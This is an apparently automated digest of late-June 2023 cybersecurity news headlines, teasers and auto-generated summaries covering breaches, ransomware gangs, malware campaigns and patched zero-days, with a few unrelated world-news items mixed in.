                Autosummary: "The adversary consistently employed ManageEngine Self-service Plus exploits to gain initial access, followed by custom web shells for persistent access, and living-off-the-land (LotL) techniques for lateral movement," the cybersecurity company said.


                Microsoft Warns of Widescale Credential Stealing Attacks by Russian Hackers

                rusia-ucrania
                2023-06-26 https://thehackernews.com/2023/06/microsoft-warns-of-widescale-credential.html
                Microsoft has disclosed that it's detected a spike in credential-stealing attacks conducted by the Russian state-affiliated hacker group known as Midnight Blizzard. The intrusions, which made use of residential proxy services to obfuscate the source IP address of the attacks, target governments, IT service providers, NGOs, defense, and critical manufacturing sectors, the tech giant's threat

                Autosummary: The intrusions, which made use of residential proxy services to obfuscate the source IP address of the attacks, target governments, IT service providers, NGOs, defense, and critical manufacturing sectors, the tech giant's threat intelligence team said.


                Suncor Energy cyberattack impacts Petro-Canada gas stations

                industry ciber
                2023-06-26 https://www.bleepingcomputer.com/news/security/suncor-energy-cyberattack-impacts-petro-canada-gas-stations/
                Petro-Canada gas stations across Canada are impacted by technical problems preventing customers from paying with credit card or rewards points as its parent company, Suncor Energy, discloses that it suffered a cyberattack. [...]

                Autosummary: "At this time, we are not aware of any evidence that customer, supplier, or employee data has been compromised or misused as a result of this situation," reads the Suncor press release.


                Anatsa Android trojan now steals banking info from users in US, UK

                financial exploits
                2023-06-26 https://www.bleepingcomputer.com/news/security/anatsa-android-trojan-now-steals-banking-info-from-users-in-us-uk/
                A new mobile malware campaign since March 2023 pushes the Android banking trojan "Anatsa" to online banking customers in the U.S., the U.K., Germany, Austria, and Switzerland. [...]

                Autosummary: [Figure: Payloads retrieved from GitHub (ThreatFabric)] Anatsa collects financial information such as bank account credentials, credit card details, payment information, etc., by overlaying phishing pages on the foreground when the user attempts to launch their legitimate bank app and also via keylogging.


                New PindOS JavaScript dropper deploys Bumblebee, IcedID malware

                exploits
                2023-06-26 https://www.bleepingcomputer.com/news/security/new-pindos-javascript-dropper-deploys-bumblebee-icedid-malware/
                Security researchers discovered a new malicious tool they named PindOS that delivers the Bumblebee and IcedID malware typically associated with ransomware attacks. [...]

                Autosummary: Simple JavaScript malware dropper: In a report from cybersecurity company DeepInstinct, researchers note that the new PindOS malware dropper has only one function that comes with four parameters for downloading the payload, be it Bumblebee or the IcedID banking trojan turned malware loader.


                Hackers steal data of 45,000 New York City students in MOVEit breach

                government
                2023-06-26 https://www.bleepingcomputer.com/news/security/hackers-steal-data-of-45-000-new-york-city-students-in-moveit-breach/
                The New York City Department of Education (NYC DOE) says hackers stole documents containing the sensitive personal information of up to 45,000 students from its MOVEit Transfer server. [...]

                Autosummary: Other victims that already disclosed breaches related to the MOVEit Transfer attacks include the U.S. state of Missouri, the U.S. state of Illinois, Zellis (along with its customers BBC, Boots, Aer Lingus, and Ireland's HSE), Ofcom, the government of Nova Scotia, the American Board of Internal Medicine, and Extreme Networks.


                Energy company Suncor suffered a cyber attack and its company Petro-Canada gas reported problems at its gas stations in Canada

                industry
                2023-06-26 https://securityaffairs.com/147834/hacking/petro-canada-suncor-problems.html

                The cyber attack suffered by Suncor Energy impacted payment operations at Petro-Canada gas stations in Canada. Suncor Energy is Canada’s leading integrated energy company that provides oil sands development, production and upgrading, offshore oil and gas, and petroleum refining in Canada and the U.S. It owns the Petro-Canada retail and wholesale distribution networks. A cyber […]

                The post Energy company Suncor suffered a cyber attack and its company Petro-Canada gas reported problems at its gas stations in Canada appeared first on Security Affairs.



                Malvertising: A stealthy precursor to infostealers and ransomware attacks

                exploits ransomware
                2023-06-26 https://www.malwarebytes.com/blog/business/2023/06/malvertising-a-stealthy-precursor-to-infostealers-and-ransomware-attacks

                Categories: Business

                Malvertising, the practice of using online ads to spread malware, can have dire consequences—and the problem only seems to be growing.


                The post Malvertising: A stealthy precursor to infostealers and ransomware attacks appeared first on Malwarebytes Labs.

                Autosummary: Posted: June 26, 2023. Malvertising, the practice of using online ads to spread malware, can have dire consequences—and the problem only seems to be growing. For organizations looking to nip the malvertising-ransomware connection in the bud, however, perhaps the biggest challenge is how hard malvertising can be to spot.


                OpenSSH trojan campaign targets Linux systems and IoT devices

                exploits industry
                2023-06-26 https://www.malwarebytes.com/blog/news/2023/06/openssh-trojan-campaign-targets-linux-systems-and-iot-devices

                Categories: News

                Tags: IoT, Linux, OpenSSH, trojan, botnet, IRC, attack, compromise

                Poorly configured Linux and Internet of Things (IoT) devices are at risk of compromise from a cryptojacking campaign.


                The post OpenSSH trojan campaign targets Linux systems and IoT devices appeared first on Malwarebytes Labs.

                Autosummary: The data that is taken includes: operating system version, network configuration, and the contents of /etc/passwd and /etc/shadow. Open source rootkits are installed on systems which support them, used to further hide malicious files and processes taking place under the hood. The operating system giant has some specific advice for those who may be worried about this attack impacting their business: harden internet-facing devices against attacks; ensure secure configurations for devices: change the default password to a strong one, and block SSH from external access.


                Trojanized Super Mario game used to install Windows malware

                exploits
                2023-06-25 https://www.bleepingcomputer.com/news/security/trojanized-super-mario-game-used-to-install-windows-malware/
                A trojanized installer for a popular Super Mario Bros game has been infecting unsuspecting players with multiple Windows malware families. [...]

                Autosummary: This stolen data includes information stored in web browsers, like stored passwords and cookies containing session tokens, cryptocurrency wallets, and credentials and authentication tokens for Discord, Minecraft, Roblox, and Telegram.


                American Airlines, Southwest Airlines disclose data breaches affecting pilots

                financial
                2023-06-24 https://www.bleepingcomputer.com/news/security/american-airlines-southwest-airlines-disclose-data-breaches-affecting-pilots/
                American Airlines and Southwest Airlines, two of the largest airlines in the world, disclosed data breaches on Friday caused by the hack of Pilot Credentials, a third-party vendor that manages multiple airlines' pilot applications and recruitment portals. [...]


                U.S. Cybersecurity Agency Adds 6 Flaws to Known Exploited Vulnerabilities Catalog

                exploits ciber
                2023-06-24 https://thehackernews.com/2023/06/us-cybersecurity-agency-adds-6-flaws-to.html
                The U.S. Cybersecurity and Infrastructure Security Agency has added a batch of six flaws to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. This comprises three vulnerabilities that Apple patched this week (CVE-2023-32434, CVE-2023-32435, and CVE-2023-32439), two flaws in VMware (CVE-2023-20867 and CVE-2023-20887), and one shortcoming impacting Zyxel


                Twitter Hacker Sentenced to 5 Years in Prison for $120,000 Crypto Scam

                financial
                2023-06-24 https://thehackernews.com/2023/06/twitter-hacker-sentenced-to-5-years-in.html
                A U.K. citizen who took part in the massive July 2020 hack of Twitter has been sentenced to five years in prison in the U.S. Joseph James O'Connor (aka PlugwalkJoe), 24, was awarded the sentence on Friday in the Southern District of New York, a little over a month after he pleaded guilty to the criminal schemes. He was arrested in Spain in July 2021. The infamous Twitter breach allowed the


                Microsoft Teams vulnerability allows attackers to deliver malware to employees

                exploits
                2023-06-23 https://www.helpnetsecurity.com/2023/06/23/microsoft-teams-deliver-malware/

                Security researchers have uncovered a bug that could allow attackers to deliver malware directly into employees’ Microsoft Teams inbox. “Organisations that use Microsoft Teams inherit Microsoft’s default configuration which allows users from outside of their organisation to reach out to their staff members,” Jumpsec researcher Max Corbridge explained. With a social engineering pretext to prime the target, a malware delivery attack exploiting this vulnerability has a considerable chance of success. Bypassing security controls Many organizations … More

                The post Microsoft Teams vulnerability allows attackers to deliver malware to employees appeared first on Help Net Security.

                Autosummary: Change the security settings to only allow communication with certain allow-listed domains (if the number of organizations they need to keep in touch with is small), and/or educate staff on the possibility of productivity apps such as Teams, Slack or SharePoint being used by attackers to mount social engineering attacks. Detecting attempts may prove difficult, since Microsoft currently doesn’t provide logs that cover potentially malicious events originating from external tenants, and using web proxy logs to alert on staff members accepting external message requests offers very limited insight, he added.


                Powerful JavaScript Dropper PindOS Distributes Bumblebee and IcedID Malware

                exploits
                2023-06-23 https://thehackernews.com/2023/06/powerful-javascript-dropper-pindos.html
                A new strain of JavaScript dropper has been observed delivering next-stage payloads like Bumblebee and IcedID. Cybersecurity firm Deep Instinct is tracking the malware as PindOS, which contains the name in its "User-Agent" string. Both Bumblebee and IcedID serve as loaders, acting as a vector for other malware on compromised hosts, including ransomware. A recent report from Proofpoint


                New Cryptocurrency Mining Campaign Targets Linux Systems and IoT Devices

                industry
                2023-06-23 https://thehackernews.com/2023/06/new-cryptocurrency-mining-campaign.html
                Internet-facing Linux systems and Internet of Things (IoT) devices are being targeted as part of a new campaign designed to illicitly mine cryptocurrency. "The threat actors behind the attack use a backdoor that deploys a wide array of tools and components such as rootkits and an IRC bot to steal device resources for mining operations," Microsoft threat intelligence researcher Rotem Sde-Or said.

                Autosummary: Furthermore, it runs a modified version of ZiggyStarTux, an IRC-based distributed denial-of-service (DDoS) client that's capable of executing bash commands issued from the command-and-control (C2) server.


                PoC exploit released for Cisco AnyConnect, Secure Client vulnerability (CVE-2023-20178)

                exploits
                2023-06-23 https://www.helpnetsecurity.com/2023/06/23/cve-2023-20178-poc/

                Proof-of-concept (PoC) exploit code for the high-severity vulnerability (CVE-2023-20178) in Cisco Secure Client Software for Windows and Cisco AnyConnect Secure Mobility Client Software for Windows has been published. About the vulnerability Cisco Secure Client Software – previously known as Cisco AnyConnect Secure Mobility Client – is unified endpoint security software designed to assist businesses in expanding their network access capabilities and enabling remote employees to connect via both wired and wireless connections, including VPN. In … More

                The post PoC exploit released for Cisco AnyConnect, Secure Client vulnerability (CVE-2023-20178) appeared first on Help Net Security.



                University of Manchester confirms data theft in recent cyberattack

                ciber
                2023-06-23 https://www.bleepingcomputer.com/news/security/university-of-manchester-confirms-data-theft-in-recent-cyberattack/
                The University of Manchester finally confirmed that attackers behind a cyberattack disclosed in early June had stolen data belonging to alumni and current students. [...]

                Autosummary: "We have stolen 7TB of data, including confidential personal information from students and staff, research data, medical data, police reports, drug test results, databases, HR documents, finance documents, and more."


                CISA orders agencies to patch iPhone bugs abused in spyware attacks

                exploits
                2023-06-23 https://www.bleepingcomputer.com/news/security/cisa-orders-agencies-to-patch-iphone-bugs-abused-in-spyware-attacks/
                Today, CISA ordered federal agencies to patch recently patched security vulnerabilities exploited as zero-days to deploy Triangulation spyware on iPhones via iMessage zero-click exploits. [...]

                Autosummary: The list of affected devices is extensive, as the zero-day affects older and newer models, and it includes: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later; iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation).


                The Week in Ransomware - June 23rd 2023 - The Reddit Files

                exploits ransomware
                2023-06-23 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-june-23rd-2023-the-reddit-files/
                It was a relatively quiet week regarding ransomware news, with the BlackCat ransomware gang extorting Reddit and the ongoing MOVEit Transfer data breaches being the main focus. [...]

                Autosummary: docuseries on YouTube. Contributors and those who provided new ransomware information and stories this week include: @demonslay335, @BleepinComputer, @fwosar, @serghei, @billtoulas, @Seifreed, @malwrhunterteam, @Ionut_Ilascu, @LawrenceAbrams, @NCCGroupplc, @NCSC, @pcrisk, @vxunderground, @AlvieriD, and @BrettCallow.


                5 facts to know about the Royal ransomware gang

                exploits ransomware
                2023-06-23 https://www.malwarebytes.com/blog/business/2023/06/5-facts-to-know-about-the-royal-ransomware-gang

                Categories: Business

                A quick look at the cybercriminal group known as Royal—one of the fastest growing ransomware gangs today.


                The post 5 facts to know about the Royal ransomware gang appeared first on Malwarebytes Labs.

                Autosummary: 1. 66% of their initial access is done through phishing. It seems there are three things certain in life: death, taxes, and phishing as a reliable attack vector. Once you've isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. [Figure: Known Royal attacks up to May 2023 by country] For comparison, 43% of all known ransomware attacks were on the USA in the same November 2022 to June 2023 time period. The Services, Wholesale, and Technology industries are their top victims. When we look at Royal ransomware's victimology, no overwhelming pattern stands out like it does for Vice Society.


                CISA orders govt agencies to patch bugs exploited by Russian hackers

                exploits rusia-ucrania
                2023-06-22 https://www.bleepingcomputer.com/news/security/cisa-orders-govt-agencies-to-patch-bugs-exploited-by-russian-hackers/
                On Thursday, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added six more security flaws to its known exploited vulnerabilities (KEV) list. [...]


                Microsoft: Hackers hijack Linux systems using trojanized OpenSSH version

                exploits
                2023-06-22 https://www.bleepingcomputer.com/news/security/microsoft-hackers-hijack-linux-systems-using-trojanized-openssh-version/
                Microsoft says Internet-exposed Linux and Internet of Things (IoT) devices are being hijacked in brute-force attacks as part of a recently observed cryptojacking campaign. [...]

                Autosummary: "It also identifies miner processes and files by their names and either terminates them or blocks access to them, and removes SSH access configured in authorized_keys by other adversaries," Microsoft said.


                VMware fixes vCenter Server bugs allowing code execution, auth bypass

                exploits
                2023-06-22 https://www.bleepingcomputer.com/news/security/vmware-fixes-vcenter-server-bugs-allowing-code-execution-auth-bypass/
                VMware has addressed multiple high-severity security flaws in vCenter Server, which can let attackers gain code execution and bypass authentication on unpatched systems. [...]


                Apple issues fix for zero-day flaws used in spy attacks against Kaspersky. Patch now!

                exploits
                2023-06-22 https://grahamcluley.com/apple-issues-fix-for-zero-day-flaws-used-in-spy-attacks-against-kaspersky-patch-now/
                If you have an Apple computer, watch, or smartphone you have hopefully already received a notification that you should install an update to your operating system. And yes, you really should update your devices.


                $10 million reward offered for information on Cl0p ransomware gang

                exploits ransomware
                2023-06-22 https://grahamcluley.com/10-million-reward-offered-for-information-on-cl0p-ransomware-gang/
                Fancy $10 million? Of course you do! Well, all you have to do is provide information that helps identify or locate members of the notorious Cl0p ransomware gang.


                vCISO Directory helps SMBs manage their cybersecurity

                ciber
                2023-06-22 https://www.helpnetsecurity.com/2023/06/22/vciso-directory-cynomi/

                The industry’s first-ever directory of virtual CISO (vCISO) service providers has gone live. This list of vCISO providers means that SMBs can tap the expertise of qualified cybersecurity professionals to protect their digital assets and ensure compliance. To help organizations shore up their cyberdefenses, MSPs, MSSPs, and consultancies have developed vCISO services. They enable businesses to avail themselves of the expertise and skills of a professional CISO to improve their cybersecurity posture, while only paying … More

                The post vCISO Directory helps SMBs manage their cybersecurity appeared first on Help Net Security.



                Apple fixes zero-day vulnerabilities used to covertly deliver spyware (CVE-2023-32435)

                exploits
                2023-06-22 https://www.helpnetsecurity.com/2023/06/22/spyware-cve-2023-32435/

                Apple has released patches for three zero-day vulnerabilities (CVE-2023-32434, CVE-2023-32435, CVE-2023-32439) exploited in the wild. The first two have been reported by Kaspersky researchers Georgy Kucherin, Leonid Bezvershenko and Boris Larin following their discovery of the iOS spyware implant they dubbed TriangleDB, and the third one by an anonymous researcher. The vulnerabilities (CVE-2023-32434, CVE-2023-32435, CVE-2023-32439): CVE-2023-32439 is a type confusion issue in the WebKit browser engine that could be triggered by the vulnerable device processing … More

                The post Apple fixes zero-day vulnerabilities used to covertly deliver spyware (CVE-2023-32435) appeared first on Help Net Security.

                Autosummary: The vulnerabilities (CVE-2023-32434, CVE-2023-32435, CVE-2023-32439): CVE-2023-32439 is a type confusion issue in the WebKit browser engine that could be triggered by the vulnerable device processing maliciously crafted web content, and may lead to arbitrary code execution.


                ChatGPT shows promise in detecting phishing sites

                financial
                2023-06-22 https://www.helpnetsecurity.com/2023/06/22/chatgpt-detect-phishing-sites/

                ChatGPT can be used to generate phishing sites, but could it also be used to reliably detect them? Security researchers have tried to answer that question. Can ChatGPT detect phishing sites based on URLs? Kaspersky researchers tested 5,265 (2322 phishing and 2943 safe) URLs. They asked ChatGPT (GPT-3.5) a simple question: “Does this link lead to a phish website?”. Based only on the form of the URL, the AI chatbot had an 87.2% detection rate … More

                The post ChatGPT shows promise in detecting phishing sites appeared first on Help Net Security.

                Autosummary: They also highlighted that ChatGPT was good at correctly identifying tactics like fake malware infection warnings, fake login errors, and phishing SMS authentication requests, and at identifying domain names that are not legitimate, but it occasionally failed to identify domain squatting and specific social engineering techniques, or to recognize a legitimate domain name if it has multiple subdomains.


                Increased spending doesn’t translate to improved cybersecurity posture

                ciber
                2023-06-22 https://www.helpnetsecurity.com/2023/06/22/average-cybersecurity-budget-increase/

                Security teams are stretched, with not enough people, skills or budget to cope with all their priorities, according to Panaseer. Average cybersecurity budgets increase in 2023: The survey of over 400 cybersecurity decision makers and practitioners across the US and UK identified that nearly one-third have concerns around a lack of security skills and lack of security training budget, and over one-quarter are worried about low security team headcount and low overall security budget. Yet adoption … More

                The post Increased spending doesn’t translate to improved cybersecurity posture appeared first on Help Net Security.



                MULTI#STORM Campaign Targets India and U.S. with Remote Access Trojans

                exploits
                2023-06-22 https://thehackernews.com/2023/06/multistorm-campaign-targets-india-and.html
                A new phishing campaign codenamed MULTI#STORM has set its sights on India and the U.S. by leveraging JavaScript files to deliver remote access trojans on compromised systems. "The attack chain ends with the victim machine infected with multiple unique RAT (remote access trojan) malware instances, such as Warzone RAT and Quasar RAT," Securonix researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov


                Camaro Dragon Hackers Strike with USB-Driven Self-Propagating Malware

                exploits
                2023-06-22 https://thehackernews.com/2023/06/camaro-dragon-hackers-strike-with-usb.html
                The Chinese cyber espionage actor known as Camaro Dragon has been observed leveraging a new strain of self-propagating malware that spreads through compromised USB drives. "While their primary focus has traditionally been Southeast Asian countries, this latest discovery reveals their global reach and highlights the alarming role USB drives play in spreading malware," Check Point said in new

                Autosummary: Another post-exploitation payload delivered alongside WispRider is a stealer module referred to as disk monitor (HPCustPartUI.dll) that stages files with predefined extensions (i.e., docx, mp3, wav, m4a, wma, aac, cda, and mid) for exfiltration.


                Zero-Day Alert: Apple Releases Patches for Actively Exploited Flaws in iOS, macOS, and Safari

                exploits
                2023-06-22 https://thehackernews.com/2023/06/zero-day-alert-apple-releases-patches.html
                Apple on Wednesday released a slew of updates for iOS, iPadOS, macOS, watchOS, and Safari browser to address a set of flaws it said were actively exploited in the wild. This includes a pair of zero-days that have been weaponized in a mobile surveillance campaign called Operation Triangulation that has been active since 2019. The exact threat actor behind the campaign is not known. "

                Autosummary: This includes "interacting with the device's file system (including file creation, modification, exfiltration, and removal), managing processes (listing and termination), extracting keychain items to gather victim credentials, and monitoring the victim's geolocation, among others. "


                Researchers released a PoC exploit for CVE-2023-20178 flaw in Cisco AnyConnect Secure

                exploits
                2023-06-22 https://securityaffairs.com/147744/hacking/cve-2023-20178-poc-exploit-code.html

                The proof-of-concept (PoC) exploit code for a high-severity vulnerability (CVE-2023-20178) in Cisco AnyConnect Secure was published online. A security researcher has published a proof-of-concept (PoC) exploit code for the high-severity vulnerability, tracked as CVE-2023-20178 (CVSS score of 7.8), impacting Cisco AnyConnect Secure Mobility Client and Secure Client for Windows. AnyConnect is a secure remote access VPN […]

                The post Researchers released a PoC exploit for CVE-2023-20178 flaw in Cisco AnyConnect Secure appeared first on Security Affairs.

                "

                Autosummary: "


                Norton parent firm Gen Digital was a victim of a MOVEit ransomware attack too

                exploits ransomware
                2023-06-22 https://securityaffairs.com/147739/cyber-crime/gen-digital-moveit-ransomware-attack.html

                Norton parent firm, Gen Digital, was the victim of a ransomware attack that exploited the recently disclosed MOVEit zero-day vulnerability. Gen Digital Inc. (formerly Symantec Corporation and NortonLifeLock) is a multinational software company that provides cybersecurity software and services.  The company owns multiple brands, including Norton, Avast, LifeLock, Avira, AVG, ReputationDefender, and CCleaner. Gen Digital said it was the victim of a ransomware attack, […]

                The post Norton parent firm Gen Digital was a victim of a MOVEit ransomware attack too appeared first on Security Affairs.

                "

                Autosummary: "


                Apple addressed actively exploited zero-day flaws in iOS, macOS, and Safari

                exploits
                2023-06-22 https://securityaffairs.com/147729/hacking/apple-zero-day-flaws-exploited.html

                Apple rolled out security updates to address actively exploited zero-day flaws in iOS, iPadOS, macOS, watchOS, and Safari. Apple addressed a set of vulnerabilities in iOS, iPadOS, macOS, watchOS, and the Safari browser that were actively exploited in the wild. The IT giant addressed the zero-day vulnerabilities, tracked as CVE-2023-32434 and CVE-2023-32435, exploited as part […]

                The post Apple addressed actively exploited zero-day flaws in iOS, macOS, and Safari appeared first on Security Affairs.

                "

                Autosummary: Today Apple released updates for CVE-2023-32434 (Kernel) and CVE-2023-32435 (WebKit) in-the-wild zero-days which were discovered by us (@kucher1n, @bzvr_ and yours truly) in the #iOSTriangulation attacks. "


                Bolsonaro: Trial which could bar Brazil ex-leader from office starts

                latam
                2023-06-22 https://www.bbc.co.uk/news/world-latin-america-65984289?at_medium=RSS&at_campaign=KARANGA
                Brazil"s ex-president faces charges of spreading false information about Brazil"s electoral system. "

                Autosummary: "


                Barbados PM fights for shake-up of global climate finance

                financial
                2023-06-22 https://www.bbc.co.uk/news/science-environment-65962997?at_medium=RSS&at_campaign=KARANGA
                At a climate summit in Paris, Barbados's prime minister wants to raise billions for poor nations. "

                Autosummary: "


                Microsoft Teams bug allows malware delivery from external accounts

                exploits
                2023-06-22 https://www.bleepingcomputer.com/news/security/microsoft-teams-bug-allows-malware-delivery-from-external-accounts/
                Security researchers have found a simple way to deliver malware to an organization with Microsoft Teams, despite restrictions in the application for files from external sources. [...] "

                Autosummary: Furthermore, if the attacker registers a domain on Microsoft 365 that resembles the target organization's, their messages could be made to appear as if they come from someone inside the organization rather than from an external tenant, increasing the likelihood of the target downloading the file. "


                NSA shares tips on blocking BlackLotus UEFI malware attacks

                exploits
                2023-06-22 https://www.bleepingcomputer.com/news/security/nsa-shares-tips-on-blocking-blacklotus-uefi-malware-attacks/
                The U.S. National Security Agency (NSA) released today guidance on how to defend against BlackLotus UEFI bootkit malware attacks. [...] "

                Autosummary: " In today"s advisory, the U.S. intelligence agency recommended the following measures as additional mitigations: Apply the latest security updates, update recovery media, and activate optional mitigation Harden defensive policies by configuring endpoint security software to block BlackLotus malware installation attempts Use endpoint security products and firmware monitoring tools to monitor device integrity measurements and boot configuration Customize UEFI Secure Boot to block older (pre-January 2022), signed Windows boot loaders BlackLotus has been used in attacks targeting Windows 10 and 11 to exploit a vulnerability (referred to as Baton Drop and tracked as CVE-2022-21894) found in older boot loaders (aka boot managers) which helps bypass Secure Boot protection and trigger a series of malicious actions designed to compromise system security. "


                New Mirai botnet targets tens of flaws in popular IoT devices

                industry
                2023-06-22 https://securityaffairs.com/147750/malware/mirai-botnet-iot-devices.html

                Since March 2023, Unit 42 researchers have observed a variant of the Mirai botnet spreading by targeting tens of flaws in D-Link, Zyxel, and Netgear devices. Since March 2023, researchers at Palo Alto Networks Unit 42 have observed a new variant of the Mirai botnet targeting multiple vulnerabilities in popular IoT devices. Below is the […]

                The post New Mirai botnet targets tens of flaws in popular IoT devices appeared first on Security Affairs.

                "

                Autosummary: Upon executing the script, it would download and execute the proper bot clients for the specific Linux architectures. Once the bot client has been executed, the shell script downloader will delete the client executable file to avoid detection. "


                Malwarebytes only vendor to win every MRG Effitas award in 2022 & 2023

                exploits
                2023-06-22 https://www.malwarebytes.com/blog/business/2023/06/malwarebytes-only-vendor-to-win-every-mrg-effitas-certification-award-in-2022

                Categories: Business

                Dive into where we prevented more than the rest and how we were able to do it.

                (Read more...)

                The post Malwarebytes only vendor to win every MRG Effitas award in 2022 & 2023 appeared first on Malwarebytes Labs.

                "

                Autosummary: MRG Effitas assesses a product's ability to meet today's most pressing threats, including stopping zero-day malware, ransomware, exploits, and more—and doing so with speedy performance and low false positives. 100% of zero-day threats blocked: One of the many strong suits of our detection is that it can detect malware that has never been seen before, also called zero-day malware. "


                UPS warns customers of phishing attempts after data accessed

                financial
                2023-06-22 https://www.malwarebytes.com/blog/news/2023/06/ups-warns-customers-of-phishing-attempts-after-data-accessed

                Categories: Personal

                Tags: UPS

                Tags: delivery

                Tags: scam

                Tags: phish

                Tags: phishing

                Tags: smishing

                Tags: SMS

                Tags: text

                Tags: fake

                Tags: data

                UPS is warning Canadian customers of potential phishing attempts after data was left accessible via look-up tool.

                (Read more...)

                The post UPS warns customers of phishing attempts after data accessed appeared first on Malwarebytes Labs.

                "

                Autosummary: The letter goes on to mention that an internal review took place to see if information it received from shippers was somehow contributing to these attempts taking place: During that review, UPS discovered a method by which a person who searched for a particular package or misused a package look-up tool could obtain more information about the delivery, potentially including a recipient's phone number. In terms of the data potentially accessed: The information available through the package look-up tools included the recipient's name, shipment address, and potentially phone number and order number. "


                Update now! Apple fixes three actively exploited vulnerabilities

                exploits
                2023-06-22 https://www.malwarebytes.com/blog/news/2023/06/update-now-apple-fixes-three-actively-exploited-vulnerabilities

                Categories: Apple

                Categories: Exploits and vulnerabilities

                Categories: News

                Tags: Apple

                Tags: kernel webkit

                Tags: CVE-2023-32434

                Tags: CVE-2023-32435

                Tags: CVE-2023-32439

                Tags: type confusion

                Tags: integer overflow

                Tags: operation triangulation

                Apple has released security updates for several products to address a set of flaws it said were being actively exploited.

                (Read more...)

                The post Update now! Apple fixes three actively exploited vulnerabilities appeared first on Malwarebytes Labs.

                "

                Autosummary: CVE-2023-32435: a memory corruption issue in the WebKit component for iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation). If the number is used to set the length of a data buffer (an area of memory used to hold data), an integer overflow can lead to a buffer overflow, a vulnerability that allows an attacker to overload a buffer with more data than it's expecting, which creates a route for the attacker to manipulate the program. "


                Critical RCE flaw CVE-2023-20887 in VMware vRealize exploited in the wild

                exploits
                2023-06-21 https://securityaffairs.com/147668/hacking/vmware-cve-2023-20887-flaw-attacks.html

                VMware is warning customers that the critical remote code execution vulnerability CVE-2023-20887 is being actively exploited in attacks. VMware is warning customers that a critical remote code execution vulnerability in Aria Operations for Networks (formerly vRealize Network Insight), tracked as CVE-2023-20887, is being actively exploited in the wild. “VMware has confirmed that exploitation of CVE-2023-20887 has […]

                The post Critical RCE flaw CVE-2023-20887 in VMware vRealize exploited in the wild appeared first on Security Affairs.

                "

                Autosummary: "


                Chinese APT15 hackers resurface with new Graphican malware

                exploits
                2023-06-21 https://www.bleepingcomputer.com/news/security/chinese-apt15-hackers-resurface-with-new-graphican-malware/
                The Chinese state-sponsored hacking group tracked as APT15 has been observed using a novel backdoor named "Graphican" in a new campaign between late 2022 and early 2023. [...] "

                Autosummary: The complete list of commands that the C2 can send for execution by Graphican is: "C" creates an interactive command line that is controlled from the C&C server; "U" creates a file on the remote computer; "D" downloads a file from the remote computer to the C&C server; "N" creates a new process with a hidden window; "P" creates a new PowerShell process with a hidden window, saves the results in a temporary file in the TEMP folder, and sends the results to the C&C server. Other tools Symantec's researchers observed in APT15's latest campaign include EWSTEW, a custom APT15 backdoor extracting emails from infected Microsoft Exchange servers. APT15, also known as Nickel, Flea, Ke3Chang, and Vixen Panda, is a Chinese state hacking group that has targeted important public and private organizations worldwide since at least 2004. "


                VMware Aria Operations for Networks vulnerability exploited in the wild (CVE-2023-20887)

                exploits
                2023-06-21 https://www.helpnetsecurity.com/2023/06/21/cve-2023-20887-exploited/

                CVE-2023-20887, a pre-authentication command injection vulnerability in VMware Aria Operations for Networks (formerly vRealize Network Insight), has been spotted being exploited in the wild. There are no workarounds to mitigate the risk of exploitation – enterprise admins are advised to upgrade their deployments with patches. CVE-2023-20887 exploited: CVE-2023-20887 is one of three vulnerabilities recently discovered by Sina Kheirkhah of Summoning Team and an anonymous researcher and privately reported to VMware. “A malicious actor with network … More

                The post VMware Aria Operations for Networks vulnerability exploited in the wild (CVE-2023-20887) appeared first on Help Net Security.

                "

                Autosummary: "


                New Condi Malware Hijacking TP-Link Wi-Fi Routers for DDoS Botnet Attacks

                exploits
                2023-06-21 https://thehackernews.com/2023/06/new-condi-malware-hijacking-tp-link-wi.html
                A new malware called Condi has been observed exploiting a security vulnerability in TP-Link Archer AX21 (AX1800) Wi-Fi routers to rope the devices into a distributed denial-of-service (DDoS) botnet. Fortinet FortiGuard Labs said the campaign has ramped up since the end of May 2023. Condi is the work of a threat actor who goes by the online alias zxcr9999 on Telegram and runs a Telegram channel "

                Autosummary: To get around this limitation, the malware deletes multiple binaries that are used to shut down or reboot the system: /usr/sbin/reboot, /usr/bin/reboot, /usr/sbin/shutdown, /usr/bin/shutdown, /usr/sbin/poweroff, /usr/bin/poweroff, /usr/sbin/halt, and /usr/bin/halt. Condi, unlike some botnets which propagate by means of brute-force attacks, leverages a scanner module that checks for vulnerable TP-Link Archer AX21 devices and, if one is found, executes a shell script retrieved from a remote server to deposit the malware. "


                Alert! Hackers Exploiting Critical Vulnerability in VMware's Aria Operations Networks

                exploits
                2023-06-21 https://thehackernews.com/2023/06/alert-hackers-exploiting-critical.html
                VMware has flagged that a recently patched critical command injection vulnerability in Aria Operations for Networks (formerly vRealize Network Insight) has come under active exploitation in the wild. The flaw, tracked as CVE-2023-20887, could allow a malicious actor with network access to the product to perform a command injection attack, resulting in remote code execution. It impacts VMware "

                Autosummary: "


                Oreo maker Mondelez staff hit by data breach at third-party law firm

                financial
                2023-06-21 https://www.bitdefender.com/blog/hotforsecurity/oreo-maker-mondelez-staff-hit-by-data-breach-at-third-party-law-firm/
                Snack giant Mondelez is warning past and present employees that their personal information may now be in the hands of hackers following a data breach at a third-party firm. Read more in my article on the Hot for Security blog. "

                Autosummary: Error. "


                Startup Security Tactics: Friction Surveys

                industry
                2023-06-21 https://thehackernews.com/2023/06/startup-security-tactics-friction.html
                When we do quarterly planning, my team categorizes our goals within four evergreen outcomes: reduce the risk of information security incidents; increase trust in Vanta's information security program; reduce the friction caused by information security controls; and use security expertise to support the business. In this article, I'm going to focus on number three: reducing friction. Declaring your "

                Autosummary: "Excellent philosophy for the security team [...] it's just awesome, too many security teams view security as an exclusive tradeoff between team operating power and security" Hidden friction: Sometimes, when introducing new security controls, you are making a well-considered tradeoff between security and user experience. "


                Maya civilisation: Archaeologists find ancient city in jungle

                government
                2023-06-21 https://www.bbc.co.uk/news/world-latin-america-65974439?at_medium=RSS&at_campaign=KARANGA
                The remains of the city were found in an ecological reserve in a mostly unexplored area of jungle. "

                Autosummary: "


